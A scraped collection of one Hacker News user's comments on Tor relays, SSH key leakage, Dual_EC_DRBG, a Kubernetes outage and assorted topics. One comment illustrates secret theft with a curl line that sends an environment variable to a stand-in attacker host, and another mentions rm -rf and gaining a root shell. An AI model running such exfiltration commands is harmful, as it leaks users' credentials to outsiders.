Isn't that propagating with around the speed of light? Switzerland is only about 1 light ms wide so even if they only have one master clock instead of one per train station the latency should be negligible especially in the 1950s.
HN user
bauruine
I manage one of the larger Tor relay families https://tuxli.org/
contact: hn@tuxli.ch
quantum computers won't save you as they aren't helping you crack symmetric encryption like AES which is most likely used for an encrypted hard disk.
How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.
What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?
it costs me nothing to change my vocabulary
It cost reddit a 3 hour outage.
The nodeSelector and peerSelector for the route reflectors target the label `node-role.kubernetes.io/master`. In the 1.20 series, Kubernetes changed its terminology from “master” to “control-plane.” And in 1.24, they removed references to “master,” even from running clusters. This is the cause of our outage.
https://old.reddit.com/r/RedditEng/comments/11xx5o0/you_brok...
The Internet: Where the men are men, the women are men and the children are FBI agents.
True but a server that wants to "deanonymize" you can just reject each key till he has all the default keys and the ones you added to your ssh agent.
You can try it yourself [0] returns all the keys you send and even shows you your github username if one of the keys is used there.
[0] ssh whoami.filippo.io
ssh by default sends all your public keys to a server. Yes you can limit some keys to specific hosts but it's very easy to dox yourself.
The NSA surely has ordered a backdoor.
In December 2013, a Reuters news article alleged that in 2004, before NIST standardized Dual_EC_DRBG, NSA paid RSA Security $10 million in a secret deal to use Dual_EC_DRBG as the default in the RSA BSAFE cryptography library https://en.wikipedia.org/wiki/Dual_EC_DRBG
He uses the keys of his non-exit relay to directly connect from his workstation to an exit relay pretending to be the relay on his VPS. But yeah he could just use the VPS for wireguard which would be way easier.
I'm in Europe so I don't get less than 20Mbit/s on any circuit but I asume he could have got the same speed by just selecting a few local, fast nodes as bridge.
I had the same few years ago. When I pointed out that I can get full root with most of the whitelisted commands they answered "We know. It's not about security but to prevent lusers from accidentally rm -rf /* the server. Feel free to spawn a root shell. You obviously know what you do"
Releasing it is just murder by neglect so people don't feel bad about themself that they actually killed their pet just because "they can't care" for it anymore aka they don't want to deal with the minor inconvenience of caring for a pet anymore. Or worse they become a pest that wipes out whole local ecosystems.
You never release exotic pets to the wild. Isn't that common knowledge by now? If you can no longer care for an animal bring it to the vet to get it euthanized.
You don't have to be cloudflare for this kind of analysis you can do it yourself without even needing an ASN using RIPE RIS.
https://www.ripe.net/analyse/internet-measurements/routing-i...
I doubt it's that much but with the same logic you could also ban HN, SSH and basically any protocol thats not https "with no one noticing" because 99.9+% doesnt use it.
Sure but from your link
The PBL detects end-user IP address ranges which should not be attempting to directly deliver unauthenticated SMTP email to any Internet mail server. All the email originated by an IP listed in PBL is expected to be submitted - using authentication - to a SMTP server which delivers it to destination
Means in practice port 25 (unauthenticated) and port 587 (authenticated)
Tor has a transport using exactly that.
https://blog.torproject.org/introducing-webtunnel-evading-ce...
SMTP isn't filtered it's port 25 that is. And from a short look at the readme it looks like it's using the transmission port 587 which shouldn't be filtered.
Blending in with the crowd doesn't work. If you use Chrome on Windows you're part of a very large group and "don't stick out". But it's also very easy to fingerprint so you're also part of the "theturtletalks" group with the size of one.
More details here https://as32590.net/steamcache/
You mean like Matrix or XMPP? They just aren't as ubiquitous as email unfortunately.
Yes it does but you can use Tor with other browsers too so it can make sense if you want to support them.
It's only 185.220.100 [0] and 185.220.101 [1] that contain all those relays. Some of the bigger German families work together as "Stiftung Erneuerbare Freiheit" that's why you see a big cluster there. But Tor never uses relays in the same /16 for a circuit so it's not really an issue.
[0] https://metrics.torproject.org/rs.html#search/185.220.100 [1] https://metrics.torproject.org/rs.html#search/185.220.101
Tor does this sort of although not like you think. It's used as a bridge transport.
https://blog.torproject.org/introducing-webtunnel-evading-ce...
WebTunnel is a censorship-resistant pluggable transport designed to mimic encrypted web traffic (HTTPS) inspired by HTTPT. It works by wrapping the payload connection into a WebSocket-like HTTPS connection, appearing to network observers as an ordinary HTTPS (WebSocket) connection. So, for an onlooker without the knowledge of the hidden path, it just looks like a regular HTTP connection to a webpage server giving the impression that the user is simply browsing the web.
Not sure what it is but certificate transparency logs are a goldmine for this.
Tor uses the ESR (Extended Support Release) version of Firefox.
It would be completely wrong for peak demand. I had to learn this the hard way. While the small fridge I bought only uses 80 W while running the compressor uses 800W+ for a second on startup which was too much for my off the grid inverter.
You don't have to run an exit. A middle node is as important as an exit. And running a non-exit relay is pretty hassle free. You will get blocked by some sites, especially banks and governments unfortunately so be aware of that if you want to run one at home. There is a list for ISPs that allow Tor nodes [0] but diversity is important so if you know an ISP with generous traffic allotments that's better. Just check the TOS that they don't explicitly forbid running a relay. Or you could run a bridge to help censored users connect to Tor.
There is also some information on the community site about running and setting up all kinds of relays or bridges [1]
[0] https://community.torproject.org/relay/community-resources/g...
No the relays are run by the community the Torproject doesn't run any relays. You could donate to a relay associations if you don't want to run a relay yourself.
https://community.torproject.org/relay/community-resources/r...
It's made up slop. Don't waste any time on it.
You have 190 hours for Switzerland. The average full time job here is 42 hours a week at most. 4x42 = 168. Not a single person living here is working 190 hours to cover their basic needs. Sorry but your numbers are complete bullshit. No idea why this is on the front page.